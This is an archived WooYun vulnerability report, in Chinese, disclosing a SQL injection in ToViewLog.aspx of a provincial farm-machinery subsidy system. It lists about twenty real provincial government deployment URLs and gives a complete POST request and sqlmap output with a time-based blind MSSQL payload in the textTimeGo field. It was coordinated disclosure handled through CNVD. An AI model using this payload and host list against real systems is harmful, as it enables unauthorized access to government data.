当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104644

漏洞标题:某省级系统通用SQL注入(影响全国各省级行政区域)

相关厂商:山西万鸿科技

漏洞作者: 路人甲

提交时间:2015-03-30 14:31

修复时间:2015-06-29 09:40

公开时间:2015-06-29 09:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商已经确认,细节仅向厂商公开
2015-04-03: 细节向第三方安全合作伙伴开放
2015-05-25: 细节向核心白帽子及相关领域专家公开
2015-06-04: 细节向普通白帽子公开
2015-06-14: 细节向实习白帽子公开
2015-06-29: 细节向公众公开

简要描述:

某省级系统通用SQL注入(影响全国各省级行政区域)

详细说明:

系统名称:省级农机购置补贴信息管理系统
厂商:山西万鸿科技
漏洞文件:Application/Application/ToViewLog.aspx
部分案例:
http://202.75.221.11/zjnj2011/Application/Application/ToViewLog.aspx 浙江省
http://218.94.30.9/Application/Application/ToViewLog.aspx 江苏省
http://218.26.97.198/sx2014/Application/Application/ToViewLog.aspx 山西省
http://59.61.92.123:12345/njbt2013/Application/Application/ToViewLog.aspx 福建省
http://218.77.183.70/njbt2013/Application/Application/ToViewLog.aspx 海南省
http://60.190.2.79/Njbt2013/Application/Application/ToViewLog.aspx 浙江宁波
http://220.171.42.161/xjnj2013/Application/Application/ToViewLog.aspx 新疆省
http://222.247.48.179:8000/Application/Application/ToViewLog.aspx 湖南省
http://61.138.188.217/jl2013/Application/Application/ToViewLog.aspx 吉林省
http://182.148.114.118/2013/Application/Application/ToViewLog.aspx 四川省
http://amic.jxagri.gov.cn/nybgj2013/Application/Application/ToViewLog.aspx 江西省
http://113.140.74.6/sx2012/Application/Application/ToViewLog.aspx 陕西省
http://218.7.20.102:9002/njbt2013/Application/Application/ToViewLog.aspx 黑龙江省
http://61.161.166.69:2013/Application/Application/ToViewLog.aspx 辽宁省
http://njbt2012.gdnj.gov.cn/Application/Application/ToViewLog.aspx 广东省
http://218.58.77.226/njgzbt2011/Application/Application/ToViewLog.aspx 山东省
http://218.201.202.239:8081/gznj2013/Application/Application/ToViewLog.aspx 贵州省
http://116.52.13.46/test2013/Application/Application/ToViewLog.aspx 云南省
http://61.178.38.194/gsnjbt2012/Application/Application/ToViewLog.aspx 甘肃省
http://bt.ahnjh.gov.cn/2011/Application/Application/ToViewLog.aspx 安徽省
等等....
漏洞验证:
http://218.77.183.70/njbt2013/Application/ToViewLog.aspx为例:
测试数据包:

POST /njbt2013/Application/ToViewLog.aspx HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://218.77.183.70/njbt2013/Application/ToViewLog.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 1504
DNT: 1
Host: 218.77.183.70
Pragma: no-cache
Cookie: ASP.NET_SessionId=n0muyo55xc152m550bdkjk2r
__VIEWSTATE=%2FwEPDwUKMTkwMjcxMTQ5MA9kFgICAw9kFgICCQ88KwANAQAPFgYeCFBhZ2VTaXplAjIeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCBGQWAmYPZBYMAgEPZBYGZg8PFgIeBFRleHQFF%2BeUs%2Bivt%2BafpeivouWvvOWHukV4Y2VsZGQCAQ8PFgIfAwUSMjAxNS8zLzI1IDEwOjEyOjE3ZGQCAg8PFgIfAwVZ55yB55u06L6W5Y6%2F57qn6KGM5pS%2F5Y2V5L2N5piM5rGf6buO5peP6Ieq5rK75Y6%2F5Yac5py65bGAW%2BaYjOaxn%2Bm7juaXj%2BiHquayu%2BWOv%2BaTjeS9nOWRmF1kZAICD2QWBmYPDxYCHwMFF%2BeUs%2Bivt%2BafpeivouWvvOWHukV4Y2VsZGQCAQ8PFgIfAwURMjAxNS8zLzI1IDg6NDg6MzBkZAICDw8WAh8DBVnnnIHnm7Tovpbljr%2FnuqfooYzmlL%2FljZXkvY3mmIzmsZ%2Fpu47ml4%2Foh6rmsrvljr%2FlhpzmnLrlsYBb5piM5rGf6buO5peP6Ieq5rK75Y6%2F5pON5L2c5ZGYXWRkAgMPZBYGZg8PFgIfAwUX55Sz6K%2B35p%2Bl6K%2Bi5a%2B85Ye6RXhjZWxkZAIBDw8WAh8DBREyMDE1LzMvMTggODo0OTo1M2RkAgIPDxYCHwMFWeecgeebtOi%2BluWOv%2Be6p%2BihjOaUv%2BWNleS9jemZteawtOm7juaXj%2BiHquayu%2BWOv%2BWGnOacuuWxgFvpmbXmsLTpu47ml4%2Foh6rmsrvljr%2Fmk43kvZzlkZhdZGQCBA9kFgZmDw8WAh8DBR3kvIHkuJrplIDllK7mn6Xor6Llr7zlh7pFeGNlbGRkAgEPDxYCHwMFETIwMTUvMy83IDEwOjA2OjExZGQCAg8PFgIfAwU455Sf5Lqn5LyB5LiaW%2BW5v%2Bilv%2BmbhOmjnuacuuaisOWItumAoOaciemZkOi0o%2BS7u%2BWFrOWPuF1kZAIFDw8WAh4HVmlzaWJsZWhkZAIGDw8WAh8EZ2QWAmYPZBYCAgEPFgIfBGgWDgIBDw8WAh4HRW5hYmxlZGhkZAIDDw8WAh8FaGRkAgUPDxYCHwMFATFkZAIHDw8WAh8DBQExZGQCCQ8PFgIfBWhkZAILDw8WAh8FaGRkAg0PDxYCHwMFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIQ2hrVGltZXMFCUdyaWRWaWV3MQ88KwAKAQgCAWRJ6RLhNzYz%2FzCSlb0C6W3GB67k3w%3D%3D&__VIEWSTATEGENERATOR=3D4F95D8&ChkTimes=on&textTimeGo=2015-03-03&textTimeEnd=2015-03-05&btnChaXun=%E6%9F%A5%E8%AF%A2


验证结果:

---
Place: POST
Parameter: textTimeGo
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: __VIEWSTATE=/wEPDwUKMTkwMjcxMTQ5MA9kFgICAw9kFgICCQ88KwANAQAPFgYeCFB
hZ2VTaXplAjIeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWQWAmYPZBYGAgEPZBYGZg8PFgIeBFR
leHQFBiZuYnNwO2RkAgEPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHgdWaXN
pYmxlaGRkAgMPDxYCHwRoZBYCZg9kFgICAQ9kFg4CAQ8PFgIeB0VuYWJsZWRoZGQCAw8PFgIfBWhkZAI
FDw8WAh8DBQExZGQCBw8PFgIfAwUBMWRkAgkPDxYCHwVoZGQCCw8PFgIfBWhkZAINDw8WAh8DBQExZGQ
YAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCENoa1RpbWVzBQlHcmlkVmlldzEPPCs
ACgEIAgFk3kXAY6HsOuz1qVRNaKgzlDlpezI=&__VIEWSTATEGENERATOR=3D4F95D8&ChkTimes=on&
textTimeGo=2015-03-03' AND 6136=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers
AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysu
sers AS sys7) AND 'Erqr'='Erqr&textTimeEnd=2015-03-05&btnChaXun=%E6%9F%A5%E8%AF%
A2
---


1.png


1.png

漏洞证明:

如上!

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-03-31 09:38

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报,同时转由CNCERT下发给对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无